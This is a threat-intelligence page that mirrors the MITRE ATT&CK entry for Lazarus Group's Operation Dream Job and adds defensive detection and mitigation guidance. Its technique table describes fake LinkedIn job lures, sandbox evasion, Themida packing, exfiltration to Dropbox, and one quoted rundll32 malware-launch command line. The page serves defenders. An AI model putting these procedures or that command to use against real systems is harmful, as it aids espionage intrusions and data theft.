C0022: Operation Dream Job
Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]
Analyst context for executives and security teams
Operation Dream Job matters because ATT&CK describes it as a cyber espionage campaign using fake job lures against defense, aerospace, government, and other sectors, with at least one reported attempt to monetize access through business email compromise. For leaders, the practical issue is not just malware: it is whether recruiting-themed social engineering, credential exposure, remote execution, persistence, data collection, and exfiltration would be noticed quickly enough to protect sensitive programs and business communications.
Executive priority
Prioritize this as a resilience and sensitive-data protection scenario for organizations with high-value intellectual property, government-facing work, or executives and staff likely to receive career-themed outreach. Leadership should ask whether SOC, identity, email/web security, endpoint, and incident response teams can prove coverage across the full chain: user interaction with a malicious link or file, Windows execution and persistence behaviors, credential attack activity, internal discovery, tool transfer, and exfiltration over web-like command-and-control traffic. It is also useful as audit evidence for security awareness, endpoint monitoring, privileged access controls, and incident response readiness.
Technical view
The campaign object has no ATT&CK-provided detection text and no campaign-level platforms or tactics, so validation should be driven by its relationships. ATT&CK links the campaign to Lazarus Group and to tools including Responder, Torisma, and DRATzarus, plus techniques covering user execution via malicious links/files, PowerShell, Windows command shell, Visual Basic, WMI, Scheduled Task, Regsvr32, Native API, file and directory discovery, domain account discovery, brute force, ingress tool transfer, obfuscation, masqueraded file types, file deletion, web protocol C2, local data collection, and exfiltration over C2. SOC teams should test whether alerts correlate these behaviors into an intrusion narrative rather than treating them as isolated low-severity events.
Likely telemetry
- Email, web gateway, browser, and user-reporting evidence related to fake job lures, malicious links, and malicious files
- Endpoint process creation and command-line telemetry for PowerShell, cmd.exe, WMI, scheduled tasks, regsvr32.exe, Visual Basic-related execution, and unusual native API-driven behavior where available
- Windows event logs and EDR records for task creation, remote/local WMI activity, script execution, file creation/deletion, packed or encoded files, and masqueraded file types
- Identity provider, directory service, VPN, and authentication logs for brute force attempts and domain account enumeration
- Network telemetry for HTTP/S or other web protocol command-and-control patterns, tool transfer, and possible exfiltration over an existing C2 channel
Detection direction
- Because ATT&CK provides no official detection section for this campaign, map detections to the related techniques and confirm they work in the local environment.
- Correlate user-driven execution events from links or files with follow-on interpreter, WMI, scheduled task, regsvr32, tool transfer, discovery, and outbound web traffic rather than relying only on malware signatures.
- Tune for living-off-the-land behavior: PowerShell, cmd, WMI, scheduled tasks, and regsvr32 are legitimate administration tools, so detection should emphasize unusual parent/child processes, command-line content, timing, user context, remote origin, and sequence of actions.
- Validate visibility into credential-access paths, especially brute force signals and Responder-like name-resolution or rogue authentication activity, since these may be missed if identity and network telemetry are not joined.
- Review blind spots around encrypted or packed payloads, masqueraded file types, and file deletion, which can reduce the value of static file signatures and post-incident artifact recovery.
Mitigation priorities
- Start with reducing successful user execution: reinforce verification of unsolicited job or recruiting outreach, and ensure suspicious links/files can be reported and investigated quickly.
- Harden email, web, and endpoint controls for malicious links, malicious files, packed or encoded content, and masqueraded file types; use prevention where feasible but retain telemetry for investigation.
- Strengthen identity controls against brute force and account misuse, including MFA where applicable, lockout/rate-limiting policies, monitoring of domain account enumeration, and review of privileged account exposure.
- Limit and monitor administrative execution paths such as PowerShell, WMI, scheduled tasks, cmd, Visual Basic, and regsvr32 based on business need and role.
- Reduce credential capture opportunities from local name-resolution abuse by reviewing LLMNR/NBT-NS/MDNS exposure and related authentication flows where Responder-like behavior would be material.
Analyst notes and limits
The most decision-useful aspect of this campaign object is the combination of social engineering via fake job lures, Windows and cross-platform execution/stealth techniques, credential-focused activity, and data collection/exfiltration relationships. Treat it as a coverage validation scenario for managed detection, incident response, identity security, endpoint detection, and egress monitoring. Sector and country targeting are from the official ATT&CK description; they should inform prioritization but not be treated as proof of current exposure.
ATT&CK does not provide campaign-level platforms, tactics, labels, or official detection guidance for this object. The technical recommendations are inferred only from the supplied ATT&CK relationships and related object descriptions. Local asset inventory, telemetry quality, business process context, and incident evidence are required before assessing exposure or detection coverage.
Operation Dream Job
Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1614.001 | System Language Discovery Sub-technique | During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1608.001 | Upload Malware Sub-technique | For Operation Dream Job, Lazarus Group used compromised servers to host malware.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020CitationMcAfee Lazarus Nov 2020 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1106 | Native API | During Operation Dream Job, Lazarus Group used Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server.CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1585.001 | Social Media Accounts Sub-technique | For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1036.008 | Masquerade File Type Sub-technique | During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.CitationMcAfee Lazarus Jul 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1070.004 | File Deletion Sub-technique | During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.CitationESET Lazarus Jun 2020 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1497.001 | System Checks Sub-technique | During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | During Operation Dream Job, Lazarus Group executed a VBA written malicious macro after victims download malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64 encoded DLL implant.CitationClearSky Lazarus Aug 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1608.002 | Upload Tool Sub-technique | For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.CitationESET Lazarus Jun 2020 |
| Enterprise | T1105 | Ingress Tool Transfer | During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1585.002 | Email Accounts Sub-technique | During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.CitationESET Lazarus Jun 2020 |
| Enterprise | T1584.001 | Domains Sub-technique | For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.CitationMcAfee Lazarus Jul 2020CitationMcAfee Lazarus Nov 2020 |
| Enterprise | T1583.004 | Server Sub-technique | During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.CitationESET Lazarus Jun 2020 |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1059.001 | PowerShell Sub-technique | During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.CitationESET Lazarus Jun 2020 |
| Enterprise | T1591 | Gather Victim Org Information | For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1583.001 | Domains Sub-technique | During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.CitationESET Lazarus Jun 2020 |
| Enterprise | T1221 | Template Injection | During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.CitationClearSky Lazarus Aug 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1497.003 | Time Based Checks Sub-technique | During Operation Dream Job, Lazarus Group used tools that collected `GetTickCount` and `GetSystemTimeAsFileTime` data to detect sandbox or VMware services.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1589 | Gather Victim Identity Information | For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1553.002 | Code Signing Sub-technique | During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.CitationESET Lazarus Jun 2020 |
| Enterprise | T1005 | Data from Local System | During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.CitationClearSky Lazarus Aug 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1110 | Brute Force | During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.CitationESET Lazarus Jun 2020 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1534 | Internal Spearphishing | During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1684.001 | Impersonation Sub-technique | During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationThe Hacker News Lazarus Aug 2022 |
| Enterprise | T1583.006 | Web Services Sub-technique | During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1591.004 | Identify Roles Sub-technique | During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.CitationESET Lazarus Jun 2020 |
| Enterprise | T1204.002 | Malicious File Sub-technique | During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.CitationClearSky Lazarus Aug 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1588.003 | Code Signing Certificates Sub-technique | During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.CitationESET Lazarus Jun 2020 |
| Enterprise | T1087.002 | Domain Account Sub-technique | During Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.CitationESET Lazarus Jun 2020 |
| Enterprise | T1587.002 | Code Signing Certificates Sub-technique | During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.CitationESET Lazarus Jun 2020 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.CitationClearSky Lazarus Aug 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1505.004 | IIS Components Sub-technique | During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1083 | File and Directory Discovery | During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | During Operation Dream Job, Lazarus Group used `regsvr32` to execute malware.CitationESET Lazarus Jun 2020 |
| Enterprise | T1047 | Windows Management Instrumentation | During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script.CitationESET Lazarus Jun 2020 |
| Enterprise | T1027.002 | Software Packing Sub-technique | During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.CitationClearSky Lazarus Aug 2020CitationMcAfee Lazarus Jul 2020CitationMcAfee Lazarus Nov 2020 |
| Enterprise | T1588.002 | Tool Sub-technique | For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1567.002 | Exfiltration to Cloud Storage Sub-technique | During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.CitationESET Lazarus Jun 2020CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1622 | Debugger Evasion | During Operation Dream Job, Lazarus Group used tools that used the `IsDebuggerPresent` call to detect debuggers.CitationClearSky Lazarus Aug 2020 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020CitationMcAfee Lazarus Nov 2020 |
| Enterprise | T1220 | XSL Script Processing | During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.CitationESET Lazarus Jun 2020 |
| Enterprise | T1587.001 | Malware Sub-technique | For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020CitationMcAfee Lazarus Nov 2020 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1584.004 | Server Sub-technique | For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020CitationMcAfee Lazarus Jul 2020 |
| Enterprise | T1593.001 | Social Media Sub-technique | For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.CitationESET Lazarus Jun 2020 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.CitationClearSky Lazarus Aug 2020CitationESET Lazarus Jun 2020 |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.CitationESET Lazarus Jun 2020 |
Groups, software, and campaigns
G0032: Lazarus Group
Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). [1] [2] Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[3]
North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.[4][5][6]
S0678: Torisma
Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.[1]
S0174: Responder
Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [1]
S0694: DRATzarus
DRATzarus is a remote access tool (RAT) that has been used by Lazarus Group to target the defense and aerospace organizations globally since at least summer 2020. DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.2 | Current bundle | 61eb67786367… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
ClearSky Lazarus Aug 2020
ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
Open source URL -
[2]
McAfee Lazarus Jul 2020
Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
Open source URL -
[3]
ESET Lazarus Jun 2020
Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
Open source URL -
[4]
The Hacker News Lazarus Aug 2022
Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.
Open source URL -
[5]
McAfee Lazarus Nov 2020
Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
Open source URL -
[6]
Operation Interception
(Citation: ESET Lazarus Jun 2020)
-
[7]
Operation North Star
(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)
-
[8]
mitre-attack C0022Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.